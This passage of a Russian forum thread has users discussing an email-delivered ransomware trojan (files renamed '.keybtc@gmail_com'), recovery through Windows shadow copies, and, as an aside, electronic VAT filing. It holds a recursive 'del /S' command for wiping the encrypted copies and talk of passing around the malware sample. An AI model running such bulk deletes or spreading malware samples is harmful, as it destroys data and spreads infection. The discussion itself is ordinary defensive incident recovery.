        (163) Отчеты как сдаешь? Вот подписываем теперь всё КЭП (усиленная квалифицированная электронная подпись) сертификация такая. С другой подписью отчет по ТКС не примут. Пойдешь ножками или по почте...     | |||
| 166
    
        zak555 14.08.14✎ 00:42 | 
        (165) ножками сдаю     | |||
| 167
    
        Ctrekoza 14.08.14✎ 00:46 | 
        (166)Фи, не стыдно? Чай, не в деревне находишься... Да и НДС теперь по ТКС сдают, как-бы... 
 Вот первая ссылка, там внутри текста есть ссылки на новый закон по КЭП и декларацию по НДС http://www.buhonline.ru/pub/tks/2014/4/8529 | |||
| 168
    
        zak555 14.08.14✎ 00:48 | 
        (167)
 а что стыдиться ? адрес места нахождения юрлица находится недалеко от налоговой, после сдачи отчётов иди за почтой отказать в приёме ндс на бумаге никто не вправе | |||
| 169
    
        Ctrekoza 14.08.14✎ 00:59 | 
        (168) Ну это не совсем так, если выставляете и платите НДС.
 ------------------ http://www.buhonline.ru/pub/tks/2014/3/8401 ФНС напомнила, что декларации по НДС за первый квартал 2014 года необходимо отправить в электронном виде не позднее 20 апреля Обязанность по представлению деклараций по НДС исключительно в электронном виде и только через оператора электронного документооборота закреплена за налогоплательщиками пунктом 3 статьи 80 и пунктом 5 статьи 174 Налогового кодекса. Соответствующие изменения в данные нормы были внесены Федеральным законом от 28.06.13 № 134-ФЗ* | |||
| 170
    
        Партизан 14.08.14✎ 01:46 | 
        (169) а как быть тем, у кого в округе нет интернета? совсем нет, даже сотовый на улице не ловит.     | |||
| 171
    
        Ctrekoza 14.08.14✎ 01:54 | 
        (170)  В стать 174 п.5 нет ничего про отсутствие связи. Есть обязанность в электронном виде.
 Значит, если живет в лесу, будет платить ЕСХН, т.е. без НДС.... | |||
| 172
    
        Партизан 14.08.14✎ 01:58 | 
        (171) как организация, занимающаяся куплей-продажей в розницу может платить сельхозналог? ))     | |||
| 173
    
        Ctrekoza 14.08.14✎ 02:03 | 
        (172) Так в лесу же...:)     | |||
| 174
    
        Партизан 14.08.14✎ 02:15 | 
        (173) ну и что, они (2 филиала у нас таких есть) не только в лесу, но и еще дорога к ним не круглый год бывает, а только когда паром ходит и лед замерзнет, причем в одном филиале платежки в банк (чужого региона) на бумаге возят, а другие вообще всегда только за наличку за товаром ездят.     | |||
| 175
    
        Ctrekoza 14.08.14✎ 02:40 | 
        (174) Значит поедет бух в квартал один раз и сдаст по ТКС через посредника...:)
 Ну не пишут они про ваш случай...:) | |||
| 176
    
        Партизан 14.08.14✎ 02:54 | 
        (175) а для декларирования по алкоголю, например, представительства, как для ФНС, ПФР, не предусмотрено ))     | |||
| 177
    
        Ctrekoza 14.08.14✎ 02:58 | 
        (176) Значит покупаете нотик буху и вывозите его на полянку, где берет мобильный модем и ббух усиленно сдает всё и сам сдается..:)     | |||
| 178
    
        Ислам 14.08.14✎ 06:01 | 
        (19) Зачем разработчика шифратора забанили? Я хотел с ним посоветоваться.     | |||
| 179
    
        Эмбеддер 14.08.14✎ 06:15 | 
        у нас гл.бух запустила такую штуку в письме "резюме". она зашифровала все документы MS Office и *.jpg на всех своих и общих сетевых дисках. платить все равно не будем))) за такое надо уголовную ответственность, как за кражу автомобильных номеров)))     | |||
| 180
    
        Ислам 14.08.14✎ 06:26 | 
        (179) никак за такое не накажешь. По сути, те люди, которым переводятся деньги, помогают вам расшифровать файлы, а это не преступление.
 Наказать можно тех людей, которые их зашифровали (это ваша гл. бух) | |||
| 181
    
        Мутабор 14.08.14✎ 06:53 | 
        Скачал тело
 оно даже zip rar 1cd фотки, офисный, корел, кад шифрует. Прикольно | |||
| 182
    
        Эмбеддер 14.08.14✎ 07:02 | 
        (180) ну-ну)))     | |||
| 183
    
        Эмбеддер 14.08.14✎ 07:03 | 
        (180) вопрос, который автору вируса ты собирался задать, видимо, о сотрудничестве в области расшифровки был     | |||
| 184
    
        Мутабор 14.08.14✎ 07:12 | 
        Ну это не вирус, вирус себя вопроизводит, это другой тип вредоносных программ....     | |||
| 185
    
        Эмбеддер 14.08.14✎ 07:16 | 
        (184) ну да, правильно сказать - троянец     | |||
| 186
    
        zak555 14.08.14✎ 08:29 | 
        (169) > Ну это не совсем так, если выставляете и платите НДС. 
 максимальная ответственность за сдачу декларации НДС в бумажном виде -- 200 р т.е. 800 р/год сколько стоит ЭП и лицензия на сдачу через оператора ткс в год ? | |||
| 187
    
        zak555 14.08.14✎ 08:29 | 
        (167) (169) и хватит приводить ссылки на г@вняный форум     | |||
| 188
    
        zak555 14.08.14✎ 08:31 | 
        (184) он и рассылает по адресной книге себя твоим контактам     | |||
| 189
    
        Patrio_ O_Muerte 14.08.14✎ 08:57 | 
        Нас как то зашифровали, мы оплатили 1500 р и то что мы получили нам ни хрена не помогло, хотя в каком то смысле помощь оказало, но всю расшифровку на себя взяли специалисты Др.Веба, за 2 недели нам прислали готовый скрипт для расшифровки.     | |||
| 190
    
        Jump 14.08.14✎ 09:04 | 
        (100)Как все просто.
 Выход конечно хороший, только вот далеко не всегда это возможно. | |||
| 191
    
        Jump 14.08.14✎ 09:06 | 
        (188)У меня есть программка которая рассылает сообщение по всем или по выборочным контактам - аутлук называется.
 И что теперь это вирус? | |||
| 192
    
        zak555 14.08.14✎ 09:31 | 
        (191) ага     | |||
| 193
    
        Smile 8D 14.08.14✎ 09:53 | 
        (191) Ключевое слово было "себя", т.е. вирус таким образом размножается. Аутулук, насколько я знаю, себя не рассылает (тем более в автоматическом режиме)     | |||
| 194
    
        mishaPH модератор 14.08.14✎ 09:55 | 
        (189) + 100 нам также помогли.     | |||
| 195
    
        zak555 14.08.14✎ 11:34 | 
        кажись есть решение, сейчас проверю     | |||
| 196
    
        zak555 14.08.14✎ 11:48 | 
        + есть идея, как вернуть деньги, если заплатишь     | |||
| 197
    
        Эмбеддер 14.08.14✎ 11:49 | 
        (191) требуется также здравый смысл при классификации чего-либо     | |||
| 198
    
        ildary 14.08.14✎ 11:54 | 
        (81) уважаемые специалисты, как правильно сделать запрет просмотра файлов в папке с базой DBF?     | |||
| 199
    
        zak555 14.08.14✎ 12:24 | 
        РЕЗЮМЕ :
 чудным образом выяснилось, что у диска С оказались предыдущие версии, а вот у Д -- нет | |||
| 200
    
        zak555 14.08.14✎ 12:25 | 
        а теперь вопрос
 как автоматизировать процесс удаления зашифрованного файла вида ИмяФайла.Расширение.keybtc@gmail_com и перенос из папки восстановления нормального файла ИмяФайла.Расширение ? | |||
| 201
    
        NikVars 14.08.14✎ 12:53 | 
        (199) Ты про архивные образы диска С речь ведешь?!     | |||
| 202
    
        zak555 14.08.14✎ 13:02 | 
        (201) ага
 точки восстановления | |||
| 203
    
        NikVars 14.08.14✎ 13:14 | 
        (202) Ты погодь радоваться. А они пользовательские данные содержат?!     | |||
| 204
    
        zak555 14.08.14✎ 13:31 | 
        (203)
 да, наживаю диск С правой кнопкой, далее предыддущие версии, нажимаю на кнопку открыть и воля -- все данные на метсе | |||
| 205
    
        zak555 14.08.14✎ 13:31 | 
        *мест     | |||
| 206
    
        zak555 14.08.14✎ 13:31 | 
        **на месте     | |||
| 207
    
        Arhangeldk 14.08.14✎ 14:45 | 
        http://habrahabr.ru/post/232545/
 Попробуй мб поможет | |||
| 208
    
        zak555 14.08.14✎ 16:28 | 
        кто бы по 200 подсказал     | |||
| 209
    
        HeroShima 14.08.14✎ 16:31 | 
        Абрахамс...     | |||
| 210
    
        Ctrekoza 14.08.14✎ 19:20 | 
        (187) Тебя там забанили? Ты там также писал и они тебя забанили, а теперь ты всё время пишешь что форум плохой... 
 Ищи сам про КЭП. | |||
| 211
    
        zak555 14.08.14✎ 19:28 | 
        (210) нет, я там не бываю, но частенько ернуду там пишут     | |||
| 212
    
        Ctrekoza 14.08.14✎ 19:38 | 
        (211) Ты не прав.  Статьи на этом сайте хорошего качества.
 Ещё сайт аудит уважаю. | |||
| 213
    
        zak555 14.08.14✎ 19:41 | 
        (212) я неоднократно встречал там ошибки
 клерк в этом плане лучший, ибо там каждую тему модерируют и говорят, где неправильно | |||
| 214
    
        Ctrekoza 14.08.14✎ 19:50 | 
        (213) Какие темы, очнись. Я пишу про статьи. А что на форуме может ответить малознающий бух и его не успели поправить, так такие косяки могут быть у всех. 
 Читай что считаешь нужным, но, обязательно найдется человек, который тебе также заявит, что там пишут...:) Ты вопрос свой решил? | |||
| 215
    
        zak555 14.08.14✎ 19:54 | 
        (214) 
 1. хорошо, сравни с аналогичной статьёй на клерке : http://www.klerk.ru/buh/articles/345087/ 2. по теме ветки ? | |||
| 216
    
        Ctrekoza 14.08.14✎ 20:01 | 
        (215) 2. Да.     | |||
| 217
    
        zak555 14.08.14✎ 20:02 | 
        (216) с диска С восстановил данные, с диска Д -- нет
 + я так же проработал вариант, как вернуть деньги, которую платятся мошенникам | |||
| 218
    
        Ctrekoza 14.08.14✎ 20:17 | 
        (215) Однако рассчитывать, что на деле все обойдется 200-рублевым штрафом, вряд ли стоит.>>>
 Она не лучше статьи с бухонлайна. Ты не прошел по ссылке на бухонлайн и теперь так пишешь.. На бухонлайне написано ещё больше и понятнее, нужно пройтись по ссылкам в статье. А теперь вопрос? Первый квартал штрафанули на 200 р. второй на 200 р. или там уже типа злостного нарушения можно притянуть в течение периода (год)? И зачем себе создавать проблемы...( | |||
| 219
    
        Ctrekoza 14.08.14✎ 20:17 | 
        (217) Молодец. А диск Д тоже пострадал?     | |||
| 220
    
        zak555 14.08.14✎ 20:22 | 
        (218) 
 1. где на бух онЛайн написано про штраф в 200 р за квартал ? 2. 800 р/год -- ни о чём 3. + не вижу никаких проблем | |||
| 221
    
        zak555 14.08.14✎ 20:23 | 
        (219) разумеется, скрипт идёт по всем диска, в т.ч. и сетевым     | |||
| 222
    
        Ctrekoza 14.08.14✎ 20:40 | 
        (221) что решил делать?     | |||
| 223
    
        Ctrekoza 14.08.14✎ 20:43 | 
        (220) 
 1. пройди по ссылкам внутри статьи, там должно быть 2. И так из года в год? В НК есть - сдавать по ТКС, завтра могут поднять штрафы... 3. а на за чем платить штраф, если можно сдать и спать спокойно..:) | |||
| 225
    
        zak555 14.08.14✎ 21:16 | 
        (223) 
 1. не вижу 2. за день не поднимают 3. сколько годовое обслуживание по сдаче ткс ? | |||
| 227
    
        zak555 14.08.14✎ 21:37 | 
        (266) 3. сколько стоит ООО на ОСНО ?     | |||
| 228
    
        Ctrekoza 14.08.14✎ 21:42 | 
        (227) Да, там разница будет небольшая, может также, надо на их сайте смотреть прайс. А ещё, если стоит БП Проф и есть ИТС, тогда можно из программы сдавать, только кэп получить нужно, кэп стоит примерно 500-1500 р., зависит от носителя.     | |||
| 230
    
        zak555 14.08.14✎ 22:21 | 
        (228) только ИТС стоит 26 000
 + ещё ЭП | |||
| 231
    
        zak555 14.08.14✎ 22:21 | 
        (229) шифровка отрабатывается единожды     | |||
| 232
    
        Ctrekoza 14.08.14✎ 22:24 | 
        (230) Можно взять техно. По-моему, без разницы какой ИТС. Не вникала, надо посмотреть.     | |||
| 233
    
        zak555 14.08.14✎ 22:25 | 
        (232) как раз разница есть -- минимум ПРОФ
 поэтому 0.8 р против 26 р -- ни о чём | |||
| 234
    
        Ctrekoza 14.08.14✎ 22:25 | 
        (231) жуть что делать?, ты меня вчера напугал, что от контрагента пришло, можно и правда нечаянно открыть....     | |||
| 235
    
        Ctrekoza 14.08.14✎ 22:26 | 
        (233) А как обновляешь, нетиповая?     | |||
| 236
    
        zak555 14.08.14✎ 22:28 | 
        (234) воспользоваться советом из 22 и 84
 (235) у клиентов | |||
| 237
    
        zak555 19.08.14✎ 15:38 | 
        по 200 кто подскажет ?     | |||
| 238
    
        _fvadim 19.08.14✎ 15:42 | 
        (237) папка восстановления содержит необходимую структуру папок?     | |||
| 239
    
        zak555 19.08.14✎ 15:42 | 
        (238) ага     | |||
| 240
    
        _fvadim 19.08.14✎ 15:44 | 
        удалить можно попробовать так
 del /S *.keybtc@gmail_com | |||
| 241
    
        _fvadim 19.08.14✎ 15:46 | 
        и просто скопировать сверху то что есть.     | |||
| 242
    
        zak555 19.08.14✎ 15:46 | 
        (240) а переименовать ?     | |||
| 243
    
        _fvadim 19.08.14✎ 15:47 | 
        (242) кого?
 в (200) вроде нет ничего про переименование | |||
| 244
    
        zak555 19.08.14✎ 15:56 | 
        (243) если в папке с восстановлением есть некий файл, а в текущем состояние его нет (или файл переименован -- добавлен суффикс .keybtc@gmail_com), то при восстановлении точки этот файл не восстановится     | |||
| 245
    
        _fvadim 19.08.14✎ 16:08 | 
        (244) ааааа. 
 тады попробовать ren *.keybtc@gmail_com *. | |||
| 246
    
        zak555 19.08.14✎ 16:09 | 
        (245) только методика из 244 на виртуальной машине не отработала
 => пока остаётся убийство *.keybtc@gmail_com и копирование из копии в изначальное место | |||
| 247
    
        _fvadim 19.08.14✎ 16:11 | 
        если сработает, то есть нюанс - ren не умеет рекурсию, т.е. 
 запускать надо в каждом каталоге или гуглить "cmd рекурсивное переименование" | |||
| 248
    
        _fvadim 19.08.14✎ 16:12 | 
        (246) если откинуть .keybtc@gmail_com, восстанавливает?     | |||
| 249
    
        zak555 19.08.14✎ 16:14 | 
        (248) неа, не восстановил     | |||
| 250
    
        zak555 19.08.14✎ 16:14 | 
        хотя должен был     | |||
| 251
    
        _fvadim 19.08.14✎ 16:17 | 
        чёт вводные часто меняются.
 предлагаю развернуть архив и руками (пользователя) скопировать нужное. | |||
| 252
    
        zak555 19.08.14✎ 16:17 | 
        (241) ты представляешь, если это несколько сот тысяч документов *?     | |||
| 253
    
        zak555 19.08.14✎ 16:17 | ||||
| 254
    
        _fvadim 19.08.14✎ 16:21 | 
        (252) развернуть архив и показать пользователю где теперь его документы.
 ну или определиться при каких условиях происходит автоматическое восстановление. | |||
| 255
    
        zak555 20.08.14✎ 09:26 | 
        (254) мне кажется, что нужно написать некий скрипт, который будет
 0. указать в некую переменную путь к копиям : У = "\\localhost\C$\@GMT-2014.08.19-04.52.01" 1. искать по диску файлы с расширением *.keybtc@gmail_com 2. определять их путь Х 3. далее скопировать из у+х в х найденный соответствующий файл и удалить с расширением | |||
| 256
    
        _fvadim 20.08.14✎ 09:48 | 
        я писать не буду :)
 обработку напиши, найтифайлы умеет искать в подкаталогах. | |||
| 257
    
        zak555 20.08.14✎ 09:50 | 
        (256) на 1с ?
 её ещё и ставить надо | |||
| 258
    
        _fvadim 20.08.14✎ 09:52 | 
        (257) контекст форума как бы подразумевает :)
 тады батниками | |||
| 259
    
        mortal 20.08.14✎ 09:58 | 
        Вчера манагер получил письмо от известного (с кем работал раньше) контрагента. Почта, правда, была другая, но он внимания не обратил, что нормально. И в письме, как вы уже догадались, был шифровщик, зашифровавший ему весь комп. 
 Благо, на сервера не полез... | |||
| 260
    
        zak555 20.08.14✎ 10:39 | 
        (259) 
 1. нет предыдущих версий ? 2. диски сервера не подключены, как сетевые ? | |||
| 261
    
        PuhUfa 20.08.14✎ 11:02 | 
        как сделал я
 1. посмотрел где лежат похеренные файлы 2. отрезал им чужое расширение 3. пкм _на_папке_ -> предыдущая версия Откат к предыдущим версиям целыми папками заметно сокращет трудозатраты. | |||
| 262
    
        mortal 20.08.14✎ 11:27 | 
        (+259)админ позвонил этому контру: подтвердили взлом своей почты и то, что такие "письма счастья" получили почти все их контрагенты :)
 (260) 1 - нет 2 - нет | |||
| 263
    
        zak555 22.08.14✎ 08:36 | 
        (261) откат не поможет     | |||
| 264
    
        zak555 22.08.14✎ 08:36 | 
        (261)
 1. не повезло 2. не повезло | |||
| 265
    
        DrZombi гуру 22.08.14✎ 08:41 | 
        (262) Ладно, что только письма счастье.
 А вот когда тебя заносят в список спамеров и ты компания не может более отправлять почту, вот это проблема посерьезней :) | |||
| 266
    
        DrZombi гуру 22.08.14✎ 08:43 | 
        (259) Что у вас там так все плохо?
 А где настройка фильтра по содержимому, что бы кромя док и екселя, может еще и архив, ничего не принимал :) | |||
| 267
    
        Torquader 23.08.14✎ 21:20 | 
        (265) Для этого нужно иметь несколько ящиков с разными именами, чтобы даже полный отказ одного из них не приводит к последствиям.
 (266) Я тут одним "товарищам" фильтр по содержимому настроил, так они это - попросили систему переставить, так как под предложенной им ничего не работает - и не докажешь, что сделано в целях их безопасности. | |||
| 268
    
        Ислам 27.08.14✎ 06:10 | 
        (187) Это не г@вняный форум. Настоящий г@вняный форум вот: http://govnoforum.ru Хахаха!!!     | |||
| 271
    
        Besogonskiy 03.09.14✎ 15:52 | 
        (0)подари мне этот файл.     | |||
| 272
    
        zak555 03.09.14✎ 15:53 | 
        (271) см. в 54     | |||
| 273
    
        _fvadim 03.09.14✎ 15:56 | 
        (271) лентяй :)
 там файлик тянет несколько экзешников из интернету. так что толку от скрипта загрузки - 0. | 
| Форум | Правила | Описание | Объявления | Секции | Поиск | Книга знаний | Вики-миста |